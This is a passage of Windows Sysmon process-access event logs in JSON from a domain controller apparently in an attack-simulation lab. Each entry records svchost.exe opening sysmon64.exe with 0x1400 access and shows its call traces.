C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7561,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7562,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7563,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7564,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7565,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7566,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7567,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7568,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 